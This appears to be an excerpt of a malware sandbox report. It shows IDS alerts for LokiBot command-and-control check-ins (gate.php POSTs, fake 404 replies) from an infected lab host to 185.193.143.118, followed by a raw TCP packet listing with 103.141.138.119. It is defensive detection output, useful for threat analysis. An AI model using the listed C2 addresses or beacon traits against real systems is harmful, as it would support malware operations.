12/21/20-08:34:57.440233	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49332	80	192.168.2.22	185.193.143.118
12/21/20-08:34:57.440233	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49332	80	192.168.2.22	185.193.143.118
12/21/20-08:34:57.440233	TCP	2025381	ET TROJAN LokiBot Checkin	49332	80	192.168.2.22	185.193.143.118
12/21/20-08:34:57.440233	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49332	80	192.168.2.22	185.193.143.118
12/21/20-08:34:57.440233	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49332	80	192.168.2.22	185.193.143.118
12/21/20-08:34:57.637569	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49332	185.193.143.118	192.168.2.22
12/21/20-08:34:57.901392	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49333	80	192.168.2.22	185.193.143.118
12/21/20-08:34:57.901392	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49333	80	192.168.2.22	185.193.143.118
12/21/20-08:34:57.901392	TCP	2025381	ET TROJAN LokiBot Checkin	49333	80	192.168.2.22	185.193.143.118
12/21/20-08:34:57.901392	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49333	80	192.168.2.22	185.193.143.118
12/21/20-08:34:57.901392	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49333	80	192.168.2.22	185.193.143.118
12/21/20-08:34:58.109520	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49333	185.193.143.118	192.168.2.22
12/21/20-08:34:58.356886	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49334	80	192.168.2.22	185.193.143.118
12/21/20-08:34:58.356886	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49334	80	192.168.2.22	185.193.143.118
12/21/20-08:34:58.356886	TCP	2025381	ET TROJAN LokiBot Checkin	49334	80	192.168.2.22	185.193.143.118
12/21/20-08:34:58.356886	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49334	80	192.168.2.22	185.193.143.118
12/21/20-08:34:58.356886	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49334	80	192.168.2.22	185.193.143.118
12/21/20-08:34:58.550989	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49334	185.193.143.118	192.168.2.22
12/21/20-08:34:58.807713	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49335	80	192.168.2.22	185.193.143.118
12/21/20-08:34:58.807713	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49335	80	192.168.2.22	185.193.143.118
12/21/20-08:34:58.807713	TCP	2025381	ET TROJAN LokiBot Checkin	49335	80	192.168.2.22	185.193.143.118
12/21/20-08:34:58.807713	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49335	80	192.168.2.22	185.193.143.118
12/21/20-08:34:58.807713	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49335	80	192.168.2.22	185.193.143.118
12/21/20-08:34:58.996237	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49335	185.193.143.118	192.168.2.22
12/21/20-08:34:59.259529	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49336	80	192.168.2.22	185.193.143.118
12/21/20-08:34:59.259529	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49336	80	192.168.2.22	185.193.143.118
12/21/20-08:34:59.259529	TCP	2025381	ET TROJAN LokiBot Checkin	49336	80	192.168.2.22	185.193.143.118
12/21/20-08:34:59.259529	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49336	80	192.168.2.22	185.193.143.118
12/21/20-08:34:59.259529	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49336	80	192.168.2.22	185.193.143.118
12/21/20-08:34:59.445801	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49336	185.193.143.118	192.168.2.22
12/21/20-08:34:59.709544	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49337	80	192.168.2.22	185.193.143.118
12/21/20-08:34:59.709544	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49337	80	192.168.2.22	185.193.143.118
12/21/20-08:34:59.709544	TCP	2025381	ET TROJAN LokiBot Checkin	49337	80	192.168.2.22	185.193.143.118
12/21/20-08:34:59.709544	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49337	80	192.168.2.22	185.193.143.118
12/21/20-08:34:59.709544	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49337	80	192.168.2.22	185.193.143.118
12/21/20-08:34:59.901984	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49337	185.193.143.118	192.168.2.22
12/21/20-08:35:00.160897	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49338	80	192.168.2.22	185.193.143.118
12/21/20-08:35:00.160897	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49338	80	192.168.2.22	185.193.143.118
12/21/20-08:35:00.160897	TCP	2025381	ET TROJAN LokiBot Checkin	49338	80	192.168.2.22	185.193.143.118
12/21/20-08:35:00.160897	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49338	80	192.168.2.22	185.193.143.118
12/21/20-08:35:00.160897	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49338	80	192.168.2.22	185.193.143.118
12/21/20-08:35:00.349518	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49338	185.193.143.118	192.168.2.22
12/21/20-08:35:00.610924	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49339	80	192.168.2.22	185.193.143.118
12/21/20-08:35:00.610924	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49339	80	192.168.2.22	185.193.143.118
12/21/20-08:35:00.610924	TCP	2025381	ET TROJAN LokiBot Checkin	49339	80	192.168.2.22	185.193.143.118
12/21/20-08:35:00.610924	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49339	80	192.168.2.22	185.193.143.118
12/21/20-08:35:00.610924	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49339	80	192.168.2.22	185.193.143.118
12/21/20-08:35:00.794681	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49339	185.193.143.118	192.168.2.22
12/21/20-08:35:01.047355	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49340	80	192.168.2.22	185.193.143.118
12/21/20-08:35:01.047355	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49340	80	192.168.2.22	185.193.143.118
12/21/20-08:35:01.047355	TCP	2025381	ET TROJAN LokiBot Checkin	49340	80	192.168.2.22	185.193.143.118
12/21/20-08:35:01.047355	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49340	80	192.168.2.22	185.193.143.118
12/21/20-08:35:01.047355	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49340	80	192.168.2.22	185.193.143.118
12/21/20-08:35:01.230404	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49340	185.193.143.118	192.168.2.22
12/21/20-08:35:01.481208	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49341	80	192.168.2.22	185.193.143.118
12/21/20-08:35:01.481208	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49341	80	192.168.2.22	185.193.143.118
12/21/20-08:35:01.481208	TCP	2025381	ET TROJAN LokiBot Checkin	49341	80	192.168.2.22	185.193.143.118
12/21/20-08:35:01.481208	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49341	80	192.168.2.22	185.193.143.118
12/21/20-08:35:01.481208	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49341	80	192.168.2.22	185.193.143.118
12/21/20-08:35:01.667487	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49341	185.193.143.118	192.168.2.22
12/21/20-08:35:01.938677	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49342	80	192.168.2.22	185.193.143.118
12/21/20-08:35:01.938677	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49342	80	192.168.2.22	185.193.143.118
12/21/20-08:35:01.938677	TCP	2025381	ET TROJAN LokiBot Checkin	49342	80	192.168.2.22	185.193.143.118
12/21/20-08:35:01.938677	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49342	80	192.168.2.22	185.193.143.118
12/21/20-08:35:01.938677	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49342	80	192.168.2.22	185.193.143.118
12/21/20-08:35:02.127677	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49342	185.193.143.118	192.168.2.22
12/21/20-08:35:02.388886	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49343	80	192.168.2.22	185.193.143.118
12/21/20-08:35:02.388886	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49343	80	192.168.2.22	185.193.143.118
12/21/20-08:35:02.388886	TCP	2025381	ET TROJAN LokiBot Checkin	49343	80	192.168.2.22	185.193.143.118
12/21/20-08:35:02.388886	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49343	80	192.168.2.22	185.193.143.118
12/21/20-08:35:02.388886	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49343	80	192.168.2.22	185.193.143.118
12/21/20-08:35:02.579013	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49343	185.193.143.118	192.168.2.22
12/21/20-08:35:02.836599	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49344	80	192.168.2.22	185.193.143.118
12/21/20-08:35:02.836599	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49344	80	192.168.2.22	185.193.143.118
12/21/20-08:35:02.836599	TCP	2025381	ET TROJAN LokiBot Checkin	49344	80	192.168.2.22	185.193.143.118
12/21/20-08:35:02.836599	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49344	80	192.168.2.22	185.193.143.118
12/21/20-08:35:02.836599	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49344	80	192.168.2.22	185.193.143.118
12/21/20-08:35:03.029088	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49344	185.193.143.118	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2020 08:33:20.198736906 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:20.406172037 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:20.406368971 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:20.406845093 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:20.617223978 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:20.617294073 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:20.617346048 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:20.617429018 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:20.617459059 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:20.617507935 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:20.617548943 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:20.824466944 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:20.824496984 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:20.824522972 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:20.824539900 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:20.824547052 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:20.824567080 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:20.824577093 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:20.824588060 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:20.824605942 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:20.824608088 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:20.824631929 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:20.824649096 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:20.824662924 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:20.824675083 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:20.824712038 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:20.824727058 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.031974077 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.032004118 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.032027960 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.032048941 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.032068968 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.032089949 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.032111883 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.032129049 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.032150030 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.032159090 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.032170057 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.032186031 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.032191038 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.032210112 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.032222033 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.032233000 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.032255888 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.032259941 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.032277107 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.032288074 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.032298088 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.032319069 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.032346964 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.035811901 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240109921 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240147114 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240271091 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240298033 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240333080 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240340948 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240365028 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240386009 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240406036 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240411043 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240426064 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240441084 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240451097 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240468979 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240470886 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240483999 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240499020 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240511894 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240514040 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240529060 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240537882 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240545034 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240560055 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240569115 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240577936 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240595102 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240601063 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240613937 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240633011 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240636110 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240652084 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240659952 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240677118 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240685940 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240698099 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240712881 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240720034 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240741968 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240746021 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240767002 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240773916 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240791082 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240803003 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240812063 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240833044 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240833998 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240855932 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240871906 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.240885973 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240895987 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.240915060 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.244040966 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.447772026 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.447817087 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.447860956 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.447947979 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.447982073 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448000908 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448014021 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448048115 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448077917 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448085070 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448178053 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448223114 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448230028 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448261976 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448273897 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448302031 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448312998 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448338032 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448367119 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448404074 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448453903 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448461056 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448482037 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448523998 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448528051 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448568106 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448579073 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448617935 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448622942 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448658943 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448663950 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448704958 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448712111 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448741913 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448748112 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448780060 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448785067 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448817015 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448823929 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448853016 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448858976 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448889971 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448894024 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448926926 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.448935032 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448972940 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.448988914 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.449038029 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.450525999 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451117039 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451175928 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451303959 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451350927 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451351881 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451390028 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451396942 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451432943 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451436996 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451478958 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451482058 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451515913 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451523066 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451555014 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451559067 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451591969 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451597929 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451627016 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451633930 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451664925 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451670885 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451700926 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451706886 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451744080 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451747894 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451790094 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451793909 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451826096 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451837063 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451863050 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451869011 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451900005 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451905966 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451936960 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451944113 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.451973915 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.451981068 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.452011108 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.452018023 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.452059984 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.452060938 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.452102900 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.452107906 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.452140093 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.452147007 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.452193975 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.455204010 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.456443071 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.656174898 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.656215906 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.656248093 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.656260014 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.656276941 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.656289101 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.656302929 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.656322002 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.656330109 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.656352997 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.656356096 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.656377077 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.656476974 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.657957077 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658036947 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658046007 CET	49167	80	192.168.2.22	103.141.138.119
Dec 21, 2020 08:33:21.658065081 CET	80	49167	103.141.138.119	192.168.2.22
Dec 21, 2020 08:33:21.658087969 CET	49167	80	192.168.2.22	103.141.138.119
